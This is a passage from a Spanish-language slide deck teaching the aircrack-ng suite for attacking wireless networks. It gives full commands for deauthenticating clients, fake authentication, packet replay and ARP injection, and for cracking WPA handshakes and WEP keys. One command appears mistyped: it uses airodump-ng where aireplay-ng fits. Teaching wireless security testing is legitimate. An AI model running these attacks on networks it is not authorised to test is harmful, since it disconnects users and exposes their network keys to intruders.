  • 27. @lesthack aircrack Herramientas ● Modo Monitor: ● # airmon-ng start wlan0 Instalación Ataque 0 Ataque 1 Ataque 2 Ataque 3 Cambiando MAC Fundamentos Modo Monitor
  • 28. @lesthack aircrack Herramientas ● Deauthentication Attack ● Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso. – Recuperar o desvelar un ESSID oculto. Este es un ESSID que no es divulgado o anunciado por el AP. – Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar. – Generar peticiones ARP (en Windows, algunas veces, los clientes borran su “ARP cache” cuando son desconectados). – Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 29. @lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 – -0 significa deautenticación – 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente – -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso – -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes – ath0 es el nombre de la interface Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 30. @lesthack aircrack Herramientas ● Fake Autentication ● El ataque de falsa autenticación permite realizar los dos tipos de autenticación WEP (abierta u “Open System” y compartida o “Shared Key”) y asociarse con el punto de acceso (AP). ● Esto es muy útil cuando necesitamos una dirección MAC asociada para usarla con alguno de los ataques de aireplay-ng y no hay ningún cliente asociado. ● Se debe tener en cuenta que el ataque de falsa autenticación NO genera ningún paquete ARP. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 31. @lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 – -1 significa falsa autenticación – 0 tiempo de reasociación en segundos – -e teddy es el nombre de la red wireless – -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso – -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta – ath0 es el nombre de la interface wireless ● Variaciones: – aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 32. @lesthack Crack WPA aircrack Herramientas ● Capturar: ● # airodump-ng -c 9 –bssid 00:11:22:33:44:55 -w psk ath0 ● Desautenticar cliente para capturar HandShake: ● # airodump-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:85:FD:FB:C2 ath0 ● Crackeando clave ● # aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 33. @lesthack aircrack Herramientas ● Interactive Packet Reply ● Este ataque nos permite escoger el paquete a reenviar (inyectar). ● Puede obtener paquetes para inyectar de 2 formas. – La primera es capturando paquetes con la tarjeta wireless. – La segunda es utilizando un archivo cap. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 34. @lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -2 <opciones de filtro> <opciones de reenvio> -r <nombre de archivo> <interface> – -2 significa ataque de reenvio interactivo – <opciones de filtro> – <opciones de reenvio> – -r <nombre de archivo> se usa para especificar un archivo cap del que leer los paquetes para inyectarlos (es opcional) – <interface> es la interface wireless, por ejemplo ath0 ● Ejemplo: ● # aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 35. @lesthack aircrack Herramientas ● Request Injection ● El clásico ataque de reenvio de petición ARP o “ARP request” es el modo más efectivo para generar nuevos IVs (vectores de inicialización), y funciona de forma muy eficaz. ● El programa escucha hasta encontrar un paquete ARP y cuando lo encuentra lo retransmite hacia el punto de acceso. ● Esto provoca que el punto de acceso tenga que repetir el paquete ARP con un IV nuevo. ● El programa retransmite el mismo paquete ARP una y otra vez. Pero, cada paquete ARP repetido por el AP tiene un IV nuevo. Todos estos nuevos IVs nos permitirán averiguar la clave WEP. Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 36. @lesthack aircrack Herramientas ● Uso: ● # aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 – -3 significa reenvio estandard de petición arp (arp request) – -b 00:13:10:30:24:9C es la dirección MAC del punto de acceso – -h 00:11:22:33:44:55 es la dirección MAC origen (de un cliente asociado o de una falsa autenticación) – ath0 es el nombre de la interface wireless Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor
  • 37. @lesthack aircrack Herramientas ● Crackeando los paquetes ● # aircrack-ng paquetes.ivs Instalación Cambiando MAC Fundamentos Ataque 0 Ataque 1 Ataque 2 Ataque 3 Modo Monitor